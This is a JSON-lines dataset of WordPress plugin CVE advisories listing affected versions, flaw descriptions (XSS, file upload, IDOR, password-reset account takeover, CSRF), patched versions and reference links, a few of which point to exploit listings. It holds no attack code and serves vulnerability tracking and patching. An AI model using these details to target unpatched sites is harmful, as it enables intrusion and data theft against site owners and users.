{"CVE_ID":"CVE-2024-5942","slug":"page-or-post-clone","versionImpact":"6.0","versionEndExcluding":"6.1","description":"The Page and Post Clone plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.0 via the 'content_clone' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to clone and read private posts.","recommendation":"Update to version 6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0931f279-2dac-4663-9344-df27b43a7e64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0931f279-2dac-4663-9344-df27b43a7e64?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-or-post-clone\\\/trunk\\\/page-or-post-clone.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-or-post-clone\\\/trunk\\\/page-or-post-clone.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108149\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108149\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4449","slug":"dzs-zoomsounds","versionImpact":"5.96","versionEndExcluding":"6.05","description":"The ZoomSounds plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'savepng.php' file in versions up to, and including, 5.96. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 6.05, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262e3bb3-bc83-4d0b-8056-9f94ec141b8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262e3bb3-bc83-4d0b-8056-9f94ec141b8f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ithemes.com\\\/blog\\\/wordpress-vulnerability-report-june-2021-part-5\\\/#ib-toc-anchor-2\",\"name\":\"https:\\\/\\\/ithemes.com\\\/blog\\\/wordpress-vulnerability-report-june-2021-part-5\\\/#ib-toc-anchor-2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07259a61-8ba9-4dd0-8d52-cc1df389c0ad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07259a61-8ba9-4dd0-8d52-cc1df389c0ad\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/sploitus.com\\\/exploit?id=WPEX-ID:07259A61-8BA9-4DD0-8D52-CC1DF389C0AD\",\"name\":\"https:\\\/\\\/sploitus.com\\\/exploit?id=WPEX-ID:07259A61-8BA9-4DD0-8D52-CC1DF389C0AD\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/0xAgun\\\/Arbitrary-File-Upload-ZoomSounds\",\"name\":\"https:\\\/\\\/github.com\\\/0xAgun\\\/Arbitrary-File-Upload-ZoomSounds\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8961","slug":"essential-addons-for-elementor-lite","versionImpact":"6.0.7","versionEndExcluding":"6.0.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018nomore_items_text\u2019 parameter in all versions up to, and including, 6.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45ef20aa-18e3-4ad8-a94e-76e29de5b562?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45ef20aa-18e3-4ad8-a94e-76e29de5b562?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176312\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176312\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3247","slug":"contact-form-7","versionImpact":"6.0.5","versionEndExcluding":"6.0.6","description":"The Contact Form 7 plugin for WordPress is vulnerable to Order Replay in all versions up to, and including, 6.0.5 via the 'wpcf7_stripe_skip_spam_check' function due to insufficient validation on a user controlled key. This makes it possible for unauthenticated attackers to reuse a single Stripe PaymentIntent for multiple transactions. Only the first transaction is processed via Stripe, but the plugin sends a successful email message for each transaction, which may trick an administrator into fulfilling each order.","recommendation":"Update to version 6.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7\\\/tags\\\/6.0.5\\\/modules\\\/stripe\\\/stripe.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7\\\/tags\\\/6.0.5\\\/modules\\\/stripe\\\/stripe.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270138\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270138\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38257dbf-288e-4028-af65-85f5389888ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38257dbf-288e-4028-af65-85f5389888ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2836","slug":"custom-registration-form-builder-with-submission-manager","versionImpact":"6.0.4.3","versionEndExcluding":"6.0.4.4","description":"The RegistrationMagic \u2013 Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018payment_method\u2019 parameter in all versions up to, and including, 6.0.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.0.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.4.3\\\/includes\\\/class_registration_magic.php#L1215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.4.3\\\/includes\\\/class_registration_magic.php#L1215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.4.3\\\/libs\\\/factory\\\/class_rm_form_factory_revamp.php#L1274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.4.3\\\/libs\\\/factory\\\/class_rm_form_factory_revamp.php#L1274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.4.3\\\/libs\\\/factory\\\/class_rm_form_factory_revamp.php#L1820\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.4.3\\\/libs\\\/factory\\\/class_rm_form_factory_revamp.php#L1820\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265041\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265041\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c0c3932-bdb0-4edb-bfec-2ed52cbc5cb6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c0c3932-bdb0-4edb-bfec-2ed52cbc5cb6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-27447","slug":"wp-sms","versionEndExcluding":"6.0.4.1","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in VeronaLabs WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc.This issue affects WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n\/a through 6.0.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sms\\\/wordpress-wp-sms-plugin-6-0-4-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sms\\\/wordpress-wp-sms-plugin-6-0-4-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-0402","slug":"super-forms","versionImpact":"6.0.3","versionEndExcluding":"6.0.4","description":"The Super Forms - Drag & Drop Form Builder WordPress plugin before 6.0.4 does not escape the bob_czy_panstwa_sprawa_zostala_rozwiazana parameter before outputting it back in an attribute via the super_language_switcher AJAX action, leading to a Reflected Cross-Site Scripting. The action is also lacking CSRF, making the attack easier to perform against any user.","recommendation":"Update to version 6.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e2e2478-2488-4c91-8af8-69b07783854f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e2e2478-2488-4c91-8af8-69b07783854f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/RensTillmann\\\/super-forms\\\/commit\\\/c19d65abbe43d9b6359c1bf3498dc697d0c19d02\",\"name\":\"https:\\\/\\\/github.com\\\/RensTillmann\\\/super-forms\\\/commit\\\/c19d65abbe43d9b6359c1bf3498dc697d0c19d02\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10365","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"6.0.3","versionEndExcluding":"6.0.4","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.0.3 via the render function in modules\/widgets\/tp_carousel_anything.php, modules\/widgets\/tp_page_scroll.php, and other widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 6.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ce1d19-25fa-434d-943b-d10c5cb2ec51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ce1d19-25fa-434d-943b-d10c5cb2ec51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186482\\\/the-plus-addons-for-elementor-page-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186482\\\/the-plus-addons-for-elementor-page-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9635","slug":"wc-cashapp","versionImpact":"6.0.2","versionEndExcluding":"6.0.3","description":"The Checkout with Cash App on WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wp_http_referer' parameter in several files in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-cashapp\\\/trunk\\\/includes\\\/class-wc_cashapp_square.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-cashapp\\\/trunk\\\/includes\\\/class-wc_cashapp_square.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-cashapp\\\/trunk\\\/includes\\\/class-wc_cashapp_square.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-cashapp\\\/trunk\\\/includes\\\/class-wc_cashapp_square.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-cashapp\\\/trunk\\\/includes\\\/class-wc_cashapp_square.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-cashapp\\\/trunk\\\/includes\\\/class-wc_cashapp_square.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194770%40wc-cashapp&new=3194770%40wc-cashapp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194770%40wc-cashapp&new=3194770%40wc-cashapp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/770d1b3f-45f1-40f6-80b7-808c633d2be7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/770d1b3f-45f1-40f6-80b7-808c633d2be7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9585","slug":"image-map-pro","versionImpact":"6.0.20","versionEndExcluding":"6.0.21","description":"The Image Map Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'save_project' function with an arbitrary shortcode in versions up to, and including, 6.0.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.0.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22245bb5-a310-4cd2-98e3-6611e71ff7fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22245bb5-a310-4cd2-98e3-6611e71ff7fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/imagemappro.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/imagemappro.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9584","slug":"image-map-pro","versionImpact":"6.0.20","versionEndExcluding":"6.0.21","description":"The Image Map Pro plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the AJAX functions in versions up to, and including, 6.0.20. This makes it possible for authenticated attackers with contributor-level privileges or above, to add, update or delete map projects.","recommendation":"Update to version 6.0.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c632452-8b13-4f78-aa8a-3c92bef5907f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c632452-8b13-4f78-aa8a-3c92bef5907f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/imagemappro.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/imagemappro.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10508","slug":"custom-registration-form-builder-with-submission-manager","versionImpact":"6.0.2.6","versionEndExcluding":"6.0.2.7","description":"The RegistrationMagic \u2013 User Registration Plugin with Custom Registration Forms plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 6.0.2.6. This is due to the plugin not properly validating the password reset token prior to updating a user's password. This makes it possible for unauthenticated attackers to reset the password of arbitrary users, including administrators, and gain access to these accounts.","recommendation":"Update to version 6.0.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4679fa7-be6b-4f50-8cdf-ff9822794f19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4679fa7-be6b-4f50-8cdf-ff9822794f19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.2.6\\\/public\\\/controllers\\\/class_rm_login_controller.php#L241\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.2.6\\\/public\\\/controllers\\\/class_rm_login_controller.php#L241\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181174\\\/custom-registration-form-builder-with-submission-manager\\\/trunk\\\/public\\\/controllers\\\/class_rm_login_controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181174\\\/custom-registration-form-builder-with-submission-manager\\\/trunk\\\/public\\\/controllers\\\/class_rm_login_controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.2.6\\\/public\\\/controllers\\\/class_rm_login_controller.php#L239\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/6.0.2.6\\\/public\\\/controllers\\\/class_rm_login_controller.php#L239\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9390","slug":"custom-registration-form-builder-with-submission-manager","versionImpact":"6.0.2","versionEndExcluding":"6.0.2.1","description":"The RegistrationMagic  WordPress plugin before 6.0.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.0.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a5308fb-83bf-4f6a-a7ef-e3e1b69aa80f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a5308fb-83bf-4f6a-a7ef-e3e1b69aa80f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5132","slug":"soisy-pagamento-rateale","versionImpact":"6.0.1","versionEndExcluding":"6.0.2","description":"The Soisy Pagamento Rateale plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the parseRemoteRequest function in versions up to, and including, 6.0.1. This makes it possible for unauthenticated attackers with knowledge of an existing WooCommerce Order ID to expose sensitive WooCommerce order information (e.g., Name, Address, Email Address, and other order metadata).","recommendation":"Update to version 6.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3c997cd-37b4-4b9c-b99e-397be484aa36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3c997cd-37b4-4b9c-b99e-397be484aa36?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soisy-pagamento-rateale\\\/trunk\\\/public\\\/class-soisy-pagamento-rateale-public.php#L465\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soisy-pagamento-rateale\\\/trunk\\\/public\\\/class-soisy-pagamento-rateale-public.php#L465\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4452","slug":"google-language-translator","versionEndExcluding":"6.0.10","description":"The Google Language Translator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via multiple parameters in versions up to, and including, 6.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Specifically affects users with older browsers that lack proper URL encoding support.","recommendation":"Update to version 6.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa2bd74a-563a-4a2d-b1d7-b3678db82b00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa2bd74a-563a-4a2d-b1d7-b3678db82b00?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2567706\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2567706\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2567703\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2567703\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1bd8bc19-5a6f-410b-897e-4887c05378ea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1bd8bc19-5a6f-410b-897e-4887c05378ea\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1025","slug":"simple-file-list","versionEndExcluding":"6.0.10","description":"The Simple File List WordPress plugin before 6.0.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13621b13-8d31-4214-a665-cb15981f3ec1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13621b13-8d31-4214-a665-cb15981f3ec1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8979","slug":"essential-addons-for-elementor-lite","versionImpact":"6.0.9","versionEndExcluding":"6.0.10","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.0.9 via the 'init_content_lostpassword_user_email_controls' function. This makes it possible for authenticated attackers, with Author-level access and above, to extract sensitive data including usernames and passwords of any user, including Administrators, as long as that user opens the email notification for a password change request and images are not blocked by the email client.","recommendation":"Update to version 6.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34d09086-be33-40cf-b5bf-d6c03cf0b68a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34d09086-be33-40cf-b5bf-d6c03cf0b68a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Login_Register.php#L2440\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Login_Register.php#L2440\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188634\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188634\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8978","slug":"essential-addons-for-elementor-lite","versionImpact":"6.0.9","versionEndExcluding":"6.0.10","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.0.9 via the 'init_content_register_user_email_controls' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including usernames and passwords of any users who register via the Login | Register Form widget, as long as that user opens the email notification for successful registration.","recommendation":"Update to version 6.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baae8fb9-b87c-4f61-88da-871c4c83615b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baae8fb9-b87c-4f61-88da-871c4c83615b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Login_Register.php#L2220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Login_Register.php#L2220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188634\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188634\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10536","slug":"post-block","versionImpact":"6.0.0","versionEndExcluding":"6.0.1","description":"The FancyPost \u2013 Best Ultimate Post Block, Post Grid, Layouts, Carousel, Slider For Gutenberg & Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_block_shortcode_export() function in all versions up to, and including, 6.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export shortcodes.","recommendation":"Update to version 6.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-block\\\/trunk\\\/custom-fields\\\/options\\\/admin-backup.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-block\\\/trunk\\\/custom-fields\\\/options\\\/admin-backup.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e573648e-215f-4858-a4d3-a3e85119dbcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e573648e-215f-4858-a4d3-a3e85119dbcf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4017","slug":"booster-elite-for-woocommerce","versionEndExcluding":"6.0.1","description":"The Booster for WooCommerce WordPress plugin before 6.0.1, Booster Plus for WooCommerce WordPress plugin before 6.0.1, Booster Elite for WooCommerce WordPress plugin before 6.0.1 have either flawed CSRF checks or are missing them completely in numerous places, allowing attackers to make logged in users perform unwanted actions via CSRF attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/609072d0-9bb9-4fe0-9626-7e4a334ca3a4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/609072d0-9bb9-4fe0-9626-7e4a334ca3a4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2405","slug":"float-menu","versionImpact":"6.0","versionEndExcluding":"6.0.1","description":"The Float menu  WordPress plugin before 6.0.1 does not have CSRF check in its bulk actions, which could allow attackers to make logged in admin delete arbitrary menu via a CSRF attack.","recommendation":"Update to version 6.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c42ffa15-6ebe-4c70-9e51-b95bd05ea04d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c42ffa15-6ebe-4c70-9e51-b95bd05ea04d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
